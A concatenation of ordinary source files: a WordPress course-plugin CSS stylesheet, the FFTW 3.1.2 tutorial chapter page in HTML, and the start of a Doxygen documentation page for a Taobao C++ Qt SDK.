.single-course .go-to-course-button, .single-course a.apply-button, .single-course a.apply-button, .single-course input[type="submit"].apply-button,
.single-course a.apply-button-enrolled, .single-course a.apply-button-enrolled, .single-course input[type="submit"].apply-button-enrolled
{
width: 100%;
float: right;
display: block;
background-color: #0facd9;
background: #0facd9;
color: #fff;
text-align: center;
padding: 6px 0 6px 0px;
font-family: 'Dosis', sans-serif;
font-size: 22px;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
margin-top: 20px;
-moz-border-radius: 0px;
-webkit-border-radius: 0px;
border-radius: 0px;
border: none;
text-shadow: none;
box-shadow: none;
font-weight: 300;
}
/* gray button */
.single-course span.apply-button-finished,
.single-course span.apply-button-full,
.single-course span.apply-button-enrollment-closed,
.single-course span.apply-button-enrollment-finished,
.single-course span.apply-button-prerequisite,
.single-course span.apply-button-prerequisite,
.single-course a.apply-button-finished,
a.apply-button-finished,
input[type="submit"].apply-button-finished,
.single-course span.apply-button-finished
{
width: 100%;
float: right;
display: block;
background-color: #ccc;
background: #ccc;
color: #fff;
text-align: center;
padding: 6px 0 6px 0px;
font-family: 'Dosis', sans-serif;
font-size: 22px;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
margin-top: 20px;
-moz-border-radius: 0px;
-webkit-border-radius: 0px;
border-radius: 0px;
border: none;
text-shadow: none;
font-weight: 300;
}
/* gray button archive */
.course-archive span.apply-button-finished,
.course-archive span.apply-button-full,
.course-archive span.apply-button-enrollment-closed,
.course-archive span.apply-button-enrollment-finished,
.course-archive span.apply-button-prerequisite,
.course-archive span.apply-button-prerequisite,
.course-archive a.apply-button-finished,
.course-archive a.apply-button-finished,
.course-archive input[type="submit"].apply-button-finished,
.course-archive span.apply-button-finished,
.content-instructor-profile span.apply-button-finished,
.content-instructor-profile span.apply-button-full,
.content-instructor-profile span.apply-button-enrollment-closed,
.content-instructor-profile span.apply-button-enrollment-finished,
.content-instructor-profile span.apply-button-prerequisite,
.content-instructor-profile span.apply-button-prerequisite,
.content-instructor-profile a.apply-button-finished,
.content-instructor-profile a.apply-button-finished,
.content-instructor-profile input[type="submit"].apply-button-finished,
.content-instructor-profile span.apply-button-finished
{
float: right;
display: block;
background-color: #ccc;
background: #ccc;
color: #fff;
text-align: center;
font-family: 'Dosis', sans-serif;
font-size: 22px;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
-moz-border-radius: 0px;
-webkit-border-radius: 0px;
border-radius: 0px;
border: none;
text-shadow: none;
font-weight: 300;
}
/* ff6600 */
.single-course a.apply-button-pending, a.apply-button-pending, input[type="submit"].apply-button-pending, .single-course span.apply-button-pending{
width: 100%;
float: right;
display: block;
background-color: #ff6600;
background: #ff6600;
color: #fff;
text-align: center;
padding: 6px 0 6px 0px;
font-family: 'Dosis', sans-serif;
font-size: 22px;
text-transform: uppercase;
/* text-transform: capitalize;*/
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
margin-top: 20px;
-moz-border-radius: 0px;
-webkit-border-radius: 0px;
border-radius: 0px;
border: none;
text-shadow: none;
font-weight: 300;
}
.manage-course{
float: right;
}
.h1-title{
border-bottom: 2px solid #74d1d4;
margin-top: 40px;
margin-bottom: 20px;
clear: both;
font-size: 30px;
}
.h1-instructor-title{
border-bottom: 2px solid #dadc23;
margin-top: 40px;
margin-bottom: 20px;
clear: both;
font-size: 30px;
}
.h1-about-course, .h2-instructor-bio{
border-bottom: 2px solid #74d1d4;
margin-top: 40px;
margin-bottom: 20px;
clear: both;
font-size: 30px;
}
.h1-instructors{
border-bottom: 2px solid #dadc23;
margin-top: 40px;
margin-bottom: 20px;
clear: both;
}
.single-course .clearfix{
height: 1px;
display: block;
}
.course-student-dashboard .clearfix, .notification-archive-list .clearfix{
display: block;
}
.course-student-dashboard.course-list .divider{
display: none;
}
.course-list-current,
.course-list-completed,
.course-list-managed {
}
h1.title.managed-courses-title,
h1.title.current-courses-title,
h1.title.completed-courses-title {
border-bottom: none;
font-weight:normal;
font-size: 1.4em;
padding: 4px 0;
text-transform: uppercase;
margin-bottom: 30px;
line-height: 1.2em;
margin-top:0;
}
h1.title.managed-courses-title {
color: #FF6600;
}
h1.title.current-courses-title {
color: #0FACD9;
}
h1.title.completed-courses-title {
color: #41BB8A;
}
.course-list .h1-title {
border-bottom: 2px solid #74d1d4;
clear: both;
font-size: 30px;
margin-bottom: 20px;
margin-top: 0px;
}
.course-list-completed .h1-title {
position:relative;
}
.course-list-completed .h1-title:after {
content: url( 'images/complete_tick_green.svg' );
display:block;
float:right;
width:19px;
height:19px;
}
/*//complete_tick_green.svg*/
.course-list-current .course-list-item,
.course-list-managed .course-list-item,
.course-list-completed .course-list-item {
margin:0 0 40px 0;
}
.course-list-completed button.apply-button-enrolled {
background: #41BB8A;
}
#additional-summary{
width: 100%;
float: left;
}
/* SOCIAL ICONS */
.social-shares{
width: 40%;
float: left;
font-size: 12px;
font-weight: 300;
color: #828282;
display: block;
text-transform: uppercase;
/* text-transform: capitalize;*/
margin-top: 20px;
}
.social-shares span{
display: block;
float: left;
width: 50px;
margin-top: 5px;
}
.social-shares a{
display: block;
background-image: url( "images/social-icons.png" );
background-repeat: no-repeat;
width: 27px;
height: 27px;
float: left;
margin-left: 10px;
}
.social-shares a.facebook-share{
background-position: 0px 0px;
}
.social-shares a.twitter-share{
background-position: -40px 0px;
}
.social-shares a.google-share{
background-position: -80px 0px;
}
.social-shares a.email-share{
background-position: -120px 0px;
}
.left-content{
width: 695px;
float: left;
margin-right: 30px;
}
.right-content{
width: 235px;
float: right;
margin: 10px 0 0;
}
/* INSTRUCTORS */
#instructor-profiles{
background-color:#f3f3f3;
}
#instructor-profiles p{
padding: 10px 20px 10px 20px;
color: #666;
font-size: 15px;
}
#instructor-profiles h3{
background-color: #CCC;
font-weight: 300;
font-size: 24px;
width: 100%;
padding: 5px 0px 7px 0px;
text-align: center;
color:#fff;
cursor: pointer;
margin-top: 1px;
}
#instructor-profiles h3:first-child {
margin-top: 0;
}
#instructor-profiles a.full-instructor-profile{
background-color: #5dd5fb;
font-weight: 300;
font-size: 24px;
width: 100%;
padding: 5px 0px 7px 0px;
text-align: center;
color:#fff;
cursor: pointer;
display: block;
}
#instructor-profiles h3.ui-state-active{
background-color: #23bee9;
font-weight: 300;
font-size: 24px;
width: 100%;
padding: 5px 0px 7px 0px;
text-align: center;
color:#fff;
cursor: default;
}
.entry-content .divider:last-child{
display: none;
}
/* SUBMENU */
.submenu-main-container{
border-bottom: 2px solid #23bee9;
float: left;
width: 100%;
margin-top: 20px;
}
.nav-submenu li.submenu-item{
display: inline;
margin: 0px;
}
.nav-submenu li.submenu-item:after{
content:"";
}
.nav-submenu li.submenu-item:last-child:after{
content:"";
}
.nav-submenu .submenu-active a{
text-decoration: none;
}
li.submenu-item{
float: left;
position: relative;
margin-right: 20px;
padding: 10px 12px 12px 12px;
font-size: 22px;
line-height: 17px;
}
li.submenu-item a{
display: block;
}
li.submenu-units a{
background: url( 'images/icon-units.png' );
background-repeat: no-repeat;
background-position: left center;
padding-left: 25px;
color: #808080;
}
li.submenu-notifications a{
background: url( 'images/icon-notifications.png' );
background-repeat: no-repeat;
background-position: left center;
padding-left: 25px;
color: #808080;
}
li.submenu-discussions a{
background: url( 'images/icon-discussions.png' );
background-repeat: no-repeat;
background-position: left center;
padding-left: 25px;
color: #808080;
}
li.submenu-info a{
background: url( 'images/icon-info.png' );
background-repeat: no-repeat;
background-position: left center;
padding-left: 25px;
color: #808080;
}
li.submenu-grades a{
background: url( 'images/icon-grades.png' );
background-repeat: no-repeat;
background-position: left center;
padding-left: 25px;
color: #808080;
}
li.submenu-workbook a{
background: url( 'images/icon-workbook.png' );
background-repeat: no-repeat;
background-position: left center;
padding-left: 25px;
color: #808080;
}
li.submenu-active{
/*background-color: #f3f6f8; */
}
.units-archive-list li{
background-color: #f3f6f8;
display: block;
min-height: 110px;
margin-bottom: 4px;
}
.unit-archive-single{
padding: 20px;
}
.mandatory_answer{
display: block;
text-align: right;
color: #ff6600;
font-size: 12px;
}
.grade-percentage{
float: left;
margin-right: 30px;
font-size: 35px;
display: inline;
width: 70px;
height: 70px;
float: left;
margin-top: 5px;
text-align: center;
}
.grade-active{
color:#24bde6;
}
.grade-inactive{
color:#ddd;
}
.unit-archive-single a.unit-archive-single-title{
float: left;
width: 80%;
font-size: 24px;
}
.unit-archive-single .unit-archive-single-module-status{
float: left;
width:80%;
font-size: 16px;
color: #666666;
font-weight: 400;
margin:0px;
}
.unit-archive-single-module-status.read-only-module{
color: #ccc;
}
.instructor_avatar_full{
height: 235px;
width: 235px;
display: block;
float: left;
margin-right: 10px;
position: relative;
}
.instructor_avatar_full .caption{
background-color: #23bee9;
font-weight: 300;
font-size: 24px;
width: 100%;
padding: 5px 0px 7px 0px;
text-align: center;
color: #fff;
cursor: default;
position: absolute;
top: 0;
}
.content-instructor-profile .divider:last-child{
display: none;
}
.content-instructor-profile .course-box:last-child{
margin-bottom: 30px;
}
/* FRONT MODULES */
.front-single-module-save, .front-single-module{
margin-bottom: 30px;
}
.front-single-module-save .module_description{
/*background-image: url( "images/icon-question.png" );*/
background-position: top left;
background-repeat: no-repeat;
padding: 0px 35px 0px 10px;
margin: 10px 0px 0px 40px;
min-height: 0px;
font-size: 20px;
line-height: 40px;
font-weight: 300;
}
.front-single-module .module_description{
margin-bottom: 30px;
}
.front-single-module-save .radio_answer_check_li{
padding: 0px 30px 0px 20px;
background-color: #f3f6f8;
border-top: 2px solid #dadc23;
}
.front-single-module-save .radio_answer_check_li li{
padding: 22px;
border-bottom: 1px solid #dfe8f0;
}
.front-single-module-save .radio_answer_check_li li:last-child{
border-bottom: 0px;
}
.entry-content{
margin-bottom: 30px;
}
.module_textarea_input input{
width: 98%;
}
/* CONTACT FORM */
label.full{
width: 98%;
}
.full input{
width: 97%;
margin-bottom: 20px;
}
#contact_form textarea{
width: 99%;
margin-bottom: 20px;
min-height: 100px;
}
/* NAV LINKS */
a[rel="prev"] {
float: left;
}
/* VIDEO MODULE */
.video_player{
background-color: #ebeef0;
border-bottom: 2px solid #dadc23;
margin-top: 20px;
}
.video_player iframe{
display: block;
margin-left: auto;
margin-right: auto;
}
/* NOTIFICATIONS FRONT */
.notification-archive-list{
margin-top: 38px;
}
.notification-archive-single-meta{
float: left;
width: 90px;
}
.notification-date{
-webkit-border-radius: 50%;
-moz-border-radius: 50%;
border-radius: 50%;
width: 55px;
height: 55px;
background-color: #f9a673;
color: #fff;
text-align: center;
text-transform: uppercase;
/* text-transform: capitalize;*/
margin-left: auto;
margin-right: auto;
margin-top: 8px;
}
.notification-date .date-part-one{
padding-top: 10px;
font-size: 14px;
font-weight: 400;
display: block;
width: 100%;
line-height: 14px;
}
.notification-date .date-part-two{
font-size: 24px;
display: block;
width: 100%;
line-height: 24px;
}
.notification-time{
width: auto;
color: #f9a673;
font-size: 14px;
text-transform: uppercase;
text-transform: lowercase;
text-align: center;
}
.notification-meta-divider{
background-color: #dbdbdb;
height: 2px;
width: 24px;
margin: 13px auto 10px auto;
display: block;
}
.notification-archive-single{
float: left;
width: 850px;
}
h1.notification-title{
font-size: 24px;
border-bottom: 2px solid #f2b189;
margin-bottom: 10px;
padding-bottom: 5px;
}
.notification_author{
font-size: 16px;
color: #666666;
font-weight: 400;
}
.notification-content{
margin: 10px 0px 0px 0px;
}
.notification-content, .notification-content p{
font-size: 15px;
}
/* VIDEO PLAYER */
.mejs-layers .mejs-overlay-button{
position: absolute;
top: 50%;
left: 50%;
width: 96px;
height: 97px;
margin: -50px 0 0 -50px;
background: url( images/video-play-icon.png ) no-repeat;
}
.mejs-inner .mejs-mediaelement{
background: #f3f6f8;
}
.mejs-inner .mejs-controls .mejs-button button{
/*background-color: #74d1d4;*/
}
.mejs-inner .mejs-controls .mejs-time-rail .mejs-time-current{
background: #dadc23;
}
.mejs-inner .mejs-controls .mejs-time-rail .mejs-time-loaded{
background: #5dd5fb;
}
/* Front video */
.front-single-module .video_player{
margin-top: 0px;
}
.front-single-module.video_module .wp-caption {
width: 100% !important;
}
.front-single-module .mejs-layer,
.front-single-module .mejs-container
{
position: relative;
top: 0;
left: 0;
width: 100%;
height: 100%;
}
.front-single-module .video_player .wp-video{
width: 100% !important;
height: inherit !important;
}
/* End front video */
/* UNITS FANCY DROPDOWN SELECT */
.units_dropdown_holder{
width:300px;
overflow:hidden;
}
select.units_dropdown{
color:#65bdc1;
width: 300px;
-webkit-appearance: none;
-moz-appearance: none;
text-indent: 0.01px;
text-overflow: '';
appearance: none;
padding: 3px 25px 3px 7px;
border: none;
background: url( "images/select-arrow-icon.png" ) no-repeat 24px;
background-position: right;
background-color: #eef4f7;
}
select.units_dropdown::-ms-expand {
display: none;
}
/* DISCUSSION */
.new_question{
margin-top: 30px;
background-color: #fff;
border: 2px solid #f2f6f8;
padding: 21px 0px 0px 86px;
position: relative;
}
.new_question input,
.new_question textarea{
border: 0px;
color: #666666;
padding: 0px;
width: 95%;
outline: none;
}
.new_question input[type="text"]{
font-size: 22px;
padding-bottom: 30px;
border-bottom: 1px solid #d9dcde;
margin-bottom: 16px;
}
.new_question textarea{
font-size: 18px;
min-height: 140px;
resize: none;
}
.new_question .rounded{
-webkit-border-radius: 50%;
-moz-border-radius: 50%;
border-radius: 50%;
width: 45px;
height: 45px;
background-color: #c9d4d9;
font-size: 20px;
color: #fff;
text-align: center;
text-transform: uppercase;
/* text-transform: capitalize;*/
position: absolute;
top: 21px;
left: 18px;
text-align: center;
}
.new_question .rounded span{
margin-top: 5px;
display: block;
}
.new_question a.button_cancel{
background-color: #c9d4d9;
padding: 5px 30px 5px 30px;
color: #fff;
float: right;
line-height: 24px;
margin-left: 3px;
margin-top: 5px;
}
.new_question input[type="submit"].button_submit,
.discussion-controls input[type="submit"].button_submit,
.discussion-controls .button_submit
{
background-color: #e0e24f;
padding: 5px 30px 5px 30px;
color: #fff;
float: right;
margin-left: 2px;
box-shadow: none;
width: auto;
border-radius: 0px;
font-weight: 300;
font-size: 16px;
font-family: 'Lato', sans-serif;
text-shadow: none;
line-height: 24px;
margin-top: 5px;
}
/* DISCUSSION ARCHIVE */
.discussion-archive-list{
margin-top: 38px;
}
.discussion-archive-single-meta{
float: left;
width: 90px;
}
.discussion-meta{
width: 100%;
color: #23bee9;
font-size:14px;
}
.discussion-answer-circle{
-webkit-border-radius: 50%;
-moz-border-radius: 50%;
border-radius: 50%;
width: 55px;
height: 55px;
background-color: #74d1d4;
color: #fff;
text-align: center;
text-transform: uppercase;
/* text-transform: capitalize;*/
margin-left: auto;
margin-right: auto;
margin-top: 8px;
}
.depth-2 .discussion-answer-circle, .depth-3 .discussion-answer-circle, .depth-4 .discussion-answer-circle, .depth-5 .discussion-answer-circle, .depth-6 .discussion-answer-circle, .depth-7 .discussion-answer-circle, .depth-8 .discussion-answer-circle, .depth-9 .discussion-answer-circle, .depth-10 .discussion-answer-circle{
display: none;
}
.discussion-answer-circle .comments-count{
font-size: 24px;
display: block;
width: 100%;
line-height: 24px;
padding-top: 25%;
}
.discussion-comments-circle{
-webkit-border-radius: 50%;
-moz-border-radius: 50%;
border-radius: 50%;
width: 55px;
height: 55px;
background-color: #c9d4d9;
color: #fff;
text-align: center;
text-transform: uppercase;
/* text-transform: capitalize;*/
margin-left: auto;
margin-right: auto;
margin-top: 8px;
}
.discussion-comments-circle .comments-count{
font-size: 24px;
display: block;
width: 100%;
line-height: 24px;
padding-top: 25%;
}
.discussion-archive-single{
float: left;
width: 850px;
}
.discussion-archive-single .entry-content{
margin-bottom: 0px;
}
.discussion-archive-single .entry-content p{
margin-bottom: 0.5em;
}
h1.discussion-title{
font-size: 24px;
margin-bottom: 5px;
}
.discussion-responses{
float:left;
width: 100%;
}
.discussion-responses .comment{
border-top: 1px solid #d9dcde;
padding-top: 30px;
/*margin-bottom: 30px;*/
}
.discussion-responses .comment-content{
padding-bottom: 30px;
}
.discussion-responses .comment-content p, .discussion-responses .comment-content a{
display: inline;
}
.discussion-responses .comment-body{
position: relative;
}
.discussion-responses .reply{
position: absolute;
top: 0px;
right: 0px;
}
.discussion-responses .reply a{
position: absolute;
top: -15px;
right: -35px;
text-indent: -9999px;
background-image: url( "images/icon-reply.png" );
background-repeat: no-repeat;
display: block;
width: 15px;
height: 11px;
padding: 20px;
}
#answer_the_question_button{
background-color: #74d1d4;
padding: 5px 30px 5px 30px;
color: #fff;
float: right;
margin-left: 2px;
box-shadow: none;
width: auto;
border-radius: 0px;
font-weight: 300;
font-size: 16px;
font-family: 'Lato', sans-serif;
text-shadow: none;
line-height: 24px;
margin-top: 5px;
margin-right: 2px;
}
.discussion-responses textarea{
width: 99.6%;
padding: 0px;
border: 2px solid #f2f6f8;
}
.discussion-responses h3.comment-reply-title{
font-size: 22px;
color: #666666;
padding: 20px;
background-color: #f2f6f8;
}
.comment-form-comment{
margin-bottom: 0px;
}
.quick-course-info .passcode-box{
margin-top: 0px;
}
.passcode-box input[type="password"]{
padding: 6px;
margin-top: 6px;
}
.total_grade{
font-size: 35px;
text-align: right;
padding-top: 30px;
}
#drop-mobile-nav{
display: none;
float: right;
}
.module_title{
font-size: 24px;
padding-bottom: 1px;
}
.module_description p{
margin-bottom: 10px;//-3px
}
/* Workbook */
.workbook_units .unit_title h3{
font-weight: 300;
font-size: 22px;
color: #505050;
}
div.workbook_units{
/*background-color: #f3f6f8;*/
margin-bottom: 24px;
padding: 10px;
}
div.workbook_units th{
padding-bottom: 10px;
}
div.workbook_units .unit_title{
border-bottom: 1px solid #23bee9;
padding-bottom: 7px;
margin-bottom: 8px;
}
div.workbook_units table{
margin: 0px;
}
.td-center{
text-align: center;
}
.comment_label{
margin-bottom: 10px;
display: block;
margin-top: 10px;
}
.module_response_description label,
label.comment_label,
.module_text_response_answer label{
font-weight: bold;
}
li.submenu-active a, li.submenu-item a:hover{
color: #23bee9;
text-decoration: none;
}
#modules_form input[type="submit"].apply-button-enrolled.submit-elements-data-button{
position: relative;
float: left;
}
.apply-button-enrolled.submit-elements-data-button ~ #navigation-pagination.navigation{
margin: 0px 0 0em;
}
div.workbook_units th{
font-weight: 300;
color: #b0b4b8;
font-size: 16px;
}
div.workbook_units td,
div.workbook_units th{
border-bottom: 1px dashed #d3d9d8;
}
div.workbook_units th{
padding-top: 10px;
}
div.workbook_units td{
padding-bottom: 6px;
padding-top: 4px;
overflow: hidden;
text-overflow: ellipsis;
}
.not_submitted{
color: #ea9c6b;
}
footer.comment-meta{
display: inline;
}
.clearf:after {
content: ".";
display: block;
clear: both;
visibility: hidden;
line-height: 0;
height: 0;
}
.clearf {
display: inline-block;
}
html[xmlns] .clearf {
display: block;
}
* html .clearf {
height: 1%;
}
/* WIDGETS */
.cp_featured_widget_title{
background-color: #0facd9;
color: #fff;
font-size: 18px;
padding: 10px 25px 10px 25px;
text-transform: uppercase;
/* text-transform: capitalize;*/
text-align: center;
}
.cp_featured_widget .course-thumbnail img{
border-bottom: 3px solid #ebe085;
display: block;
margin: auto;
}
.cp_featured_widget .cp_featured_widget_course_summary{
color: #666666;
line-height: 25px;
}
.cp_featured_widget_course_link a,
.cp_featured_widget_course_link a:visited,
.cp_featured_widget_course_link a:hover{
color: #fff;
background-color: #0facd9;
font-size: 18px;
padding: 7px 25px 7px 25px;
text-transform: uppercase;
/* text-transform: capitalize;*/
text-align: center;
display: block;
margin-top: 15px;
border-top: 3px solid #74d1d4;
}
.widget-title ~ .cp_featured_widget_title{
margin-top: 10px;
}
.tree .tree-unit-right a{
background-color: #8bdabc;
color: #fff;
}
.tree .tree-page-right a{
background-color: #8bdabc;
color: #fff;
}
.course_structure_unit_label{
background-color: #f3f3f3;
}
li.current-menu-item a,
li.current_page_item a{
color: #74d1d4 !important;
}
.post-type-archive-course .quick-course-info .course-time{
width: 25%;
}
.post-type-archive-course .quick-course-info .course-cost{
width: 17%;
}
.dashboard-random-courses .featured-course-title {
font-weight: 400;
}
.dashboard-random-courses .course-item {
float: left;
width: 30%;
margin-right: 30px;
}
.dashboard-random-courses .course-item:last-child {
margin-right: 0;
}
.module_grade {
font-size:0.9em;
text-align: right;
}
.virtual-page-courses-dashboard h1.entry-title{
font-size: 14px;
line-height: 16px;
margin-bottom:30px;
}
.unit-archive-course-complete {
background-image: none;
color: #ffffff;
display: block;
font-size: 20px;
font-weight: normal;
letter-spacing: 0.05em;
margin: 20px 0 0;
padding: 2px 0;
text-align: center;
width: 100%;
border-radius: 0px;
-webkit-border-radius: 0px;
-moz-border-radius: 0px;
}
.checkbox_input_module .correct,
.checkbox_input_module .incorrect,
.checkbox_input_module .unanswered,
.radio_input_module .correct,
.radio_input_module .incorrect,
.radio_input_module .unanswered {
border-bottom: none;
}
.checkbox_input_module .correct,
.radio_input_module .correct {
background-image: url('images/complete_tick_green.svg');
background-size: 16px 16px;
background-position: right center;
background-repeat: no-repeat;
}
.checkbox_input_module .incorrect,
.radio_input_module .incorrect {
background-image: url('images/cross_red.svg');
background-size: 16px 16px;
background-position: right center;
background-repeat: no-repeat;
}
.post-type-archive-course .quick-course-info .course-cost .mp_product_price {
background-position: -872px -232px;
}
.module_description ol{
list-style: decimal;
padding:0;
margin:0;
margin: 30px 0px 30px 0px;
padding-left: 2.5em;
}
.module_description ul{
list-style: none;
padding:0;
margin:0;
margin: 30px 0px 30px 0px;
}
.module_description ul li {
padding-left: 1em;
text-indent: 0em;
}
.module_description ul li:before {
content: "■ ";
color: #cdcf30;
padding-right: 10px;
}
.post-type-archive-course .video_player{
margin-top: 0px;
border-bottom: 0px;
position: relative;
}
.post-type-archive-course .video_player iframe{
width: inherit;
height: inherit;
}
.fcp_featured_widget .video_player .wp-video{
max-height: 132px !important;
}
.fcp_featured_widget .video_player{
margin-top: 0px;
}
.type-course .course-video .video_player .wp-video{
height: inherit !important;
}
.post-type-archive-course .content-area .video_player .wp-video{
height: inherit !important;
}
.entry-content .wp-video{
width: 100% !important;
}
.entry-content .mejs-container,
.entry-content .mejs-embed,
.entry-content .mejs-embed body,
.entry-content .mejs-container
.entry-content .mejs-controls{
width: 100% !important;
}
.post-type-archive-course .content-area .course-featured-media .mejs-container{
height: inherit !important;
}
.post-type-archive-course .content-area .mejs-inner .mejs-mediaelement{
background-color: black;
}
.course-featured-media{
line-height: 0px;
}
.workbook-title {
position:relative;
}
.workbook-course-progress {
font-size: 16px;
float:right;
position:absolute;
bottom:5px;
right: 0;
}
/*
RESPONSIVE
*/
@media screen and ( max-width: 980px ) {
.wrap,
.site-content,
.content-side-area,
#secondary.widget-area{
width: 96%;
margin-left: 2%;
margin-right: 2%;
position: relative;
}
.post-type-archive-course .quick-course-info{
width: 69.9%;
}
}
@media screen and ( max-width: 960px ) {
.student-settings label,
.student-settings label.right{
width: 96%;
margin-left: 2%;
margin-right: 2%;
}
.course-video{
height: auto;
}
.post-type-archive-course section.article-content-right{
float: right;
margin-right: 8px;
width: calc( 94% - 235px );
margin-top: 15px;
}
.post-type-archive-course article.type-course h1{
width: 95.6%;
margin-left: 3%;
margin-right: 3%;
}
.post-type-archive-course article.type-course h1 a, .post-type-archive-course article.type-course .entry-title a{
width: 100%;
}
.post-type-archive-course .quick-course-info{
width: calc( 92.9% - 235px );
}
.post-type-archive-course .quick-course-info.quick-course-info-extended{
width: 97.9%;
}
#course-summary{
padding: 2%;
}
.social-shares{
margin-left: 2%;
width: 100%;
}
.entry-content{
margin-bottom: 30px;
margin-left: 3%;
margin-right: 3%;
}
.left-content{
width: 96%;
}
.right-content{
float: none;
margin-left: auto;
margin-right: auto;
}
.mejs-video{
width: 100% !important;
}
.enroll-box-right{
width: 100%;
}
.notification-archive-single-meta{
float: none;
width: 90px;
margin-left: auto;
margin-right: auto;
}
.notification-archive-single,
.discussion-archive-single{
width: 96%;
margin-left: 2%;
margin-right: 2%;
}
.discussion-archive-single{
width: 96%;
margin-left: 2%;
margin-right: 2%;
}
.site-main [class*="navigation"]{
overflow: visible;
}
}
@media screen and ( max-width: 790px ) {
#drop-mobile-nav{
display: block;
float: right;
}
.main-navigation ul {
display: none;
}
.units-archive-list li {
background-color: #f3f6f8;
display: block;
min-height: 110px;
margin-bottom: 4px;
float: left;
padding-bottom: 20px;
width: 100%;
}
.enroll-box-left{
width: 100% !important;
}
}
@media screen and ( max-width: 750px ) {
.course-video{
width: 100%;
}
.entry-content-excerpt{
float: right;
width: 100%;
position: relative;
max-height: 195px;
overflow: hidden;
text-overflow: ellipsis;
margin-top: 30px;
}
.post-type-archive-course article.type-course figure,
.post-type-archive-course article.type-course .course-lang{
display: none;
}
.post-type-archive-course section.article-content-right{
float: left;
margin-left: 20px;
width: 96%;
margin-top: 15px;
}
.post-type-archive-course .quick-course-info{
width: 97%;
left: 0px;
padding-left: 3%
}
.post-type-archive-course .quick-course-info.quick-course-info-extended{
width: 97%;
left: 0px;
padding-left: 3%
}
.post-type-archive-course article.type-course h1,
.post-type-archive-course article.type-course .entry-content p,
header{
width: 97%;
margin-left: 0%;
margin-right: 0%;
}
.entry-content {
margin-bottom: 30px;
margin-left: 0.5%;
margin-right: 0%;
}
}
@media screen and ( max-width: 500px ) {
.right-content{
width: 100%;
}
.right-content img{
width: 100%;
}
}
/* 18667-1415040323-au */ |
src/libFingerprint/libs/fftw/src/doc/html/Tutorial.html | exic/last.fm-dbus | <html lang="en">
<head>
<title>Tutorial - FFTW 3.1.2</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="FFTW 3.1.2">
<meta name="generator" content="makeinfo 4.8">
<link title="Top" rel="start" href="index.html#Top">
<link rel="prev" href="Introduction.html#Introduction" title="Introduction">
<link rel="next" href="Other-Important-Topics.html#Other-Important-Topics" title="Other Important Topics">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
This manual is for FFTW
(version 3.1.2, 23 June 2006).
Copyright (C) 2003 Matteo Frigo.
Copyright (C) 2003 Massachusetts Institute of Technology.
Permission is granted to make and distribute verbatim copies of
this manual provided the copyright notice and this permission
notice are preserved on all copies.
Permission is granted to copy and distribute modified versions of
this manual under the conditions for verbatim copying, provided
that the entire resulting derived work is distributed under the
terms of a permission notice identical to this one.
Permission is granted to copy and distribute translations of this
manual into another language, under the above conditions for
modified versions, except that this permission notice may be
stated in a translation approved by the Free Software Foundation.
-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
</head>
<body>
<div class="node">
<p>
<a name="Tutorial"></a>
Next: <a rel="next" accesskey="n" href="Other-Important-Topics.html#Other-Important-Topics">Other Important Topics</a>,
Previous: <a rel="previous" accesskey="p" href="Introduction.html#Introduction">Introduction</a>,
Up: <a rel="up" accesskey="u" href="index.html#Top">Top</a>
<hr>
</div>
<h2 class="chapter">2 Tutorial</h2>
<ul class="menu">
<li><a accesskey="1" href="Complex-One_002dDimensional-DFTs.html#Complex-One_002dDimensional-DFTs">Complex One-Dimensional DFTs</a>
<li><a accesskey="2" href="Complex-Multi_002dDimensional-DFTs.html#Complex-Multi_002dDimensional-DFTs">Complex Multi-Dimensional DFTs</a>
<li><a accesskey="3" href="One_002dDimensional-DFTs-of-Real-Data.html#One_002dDimensional-DFTs-of-Real-Data">One-Dimensional DFTs of Real Data</a>
<li><a accesskey="4" href="Multi_002dDimensional-DFTs-of-Real-Data.html#Multi_002dDimensional-DFTs-of-Real-Data">Multi-Dimensional DFTs of Real Data</a>
<li><a accesskey="5" href="More-DFTs-of-Real-Data.html#More-DFTs-of-Real-Data">More DFTs of Real Data</a>
</ul>
<p>This chapter describes the basic usage of FFTW, i.e., how to compute
<a name="index-basic-interface-14"></a>the Fourier transform of a single array. This chapter tells the
truth, but not the <em>whole</em> truth. Specifically, FFTW implements
additional routines and flags that are not documented here, although
in many cases we try to indicate where added capabilities exist. For
more complete information, see <a href="FFTW-Reference.html#FFTW-Reference">FFTW Reference</a>. (Note that you
need to compile and install FFTW before you can use it in a program.
For the details of the installation, see <a href="Installation-and-Customization.html#Installation-and-Customization">Installation and Customization</a>.)
<p>We recommend that you read this tutorial in order.<a rel="footnote" href="#fn-1" name="fnd-1"><sup>1</sup></a> At the least, read the first section (see <a href="Complex-One_002dDimensional-DFTs.html#Complex-One_002dDimensional-DFTs">Complex One-Dimensional DFTs</a>) before reading any of the others, even if your
main interest lies in one of the other transform types.
<p>Users of FFTW version 2 and earlier may also want to read <a href="Upgrading-from-FFTW-version-2.html#Upgrading-from-FFTW-version-2">Upgrading from FFTW version 2</a>.
<!-- -->
<div class="footnote">
<hr>
<h4>Footnotes</h4><p class="footnote"><small>[<a name="fn-1" href="#fnd-1">1</a>]</small> You can
read the tutorial in bit-reversed order after computing your first
transform.</p>
<p><hr></div>
</body></html>
|
doc/UserContractGetRequest_8h.html | sd44/TaobaoCppQtSDK | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.3.1"/>
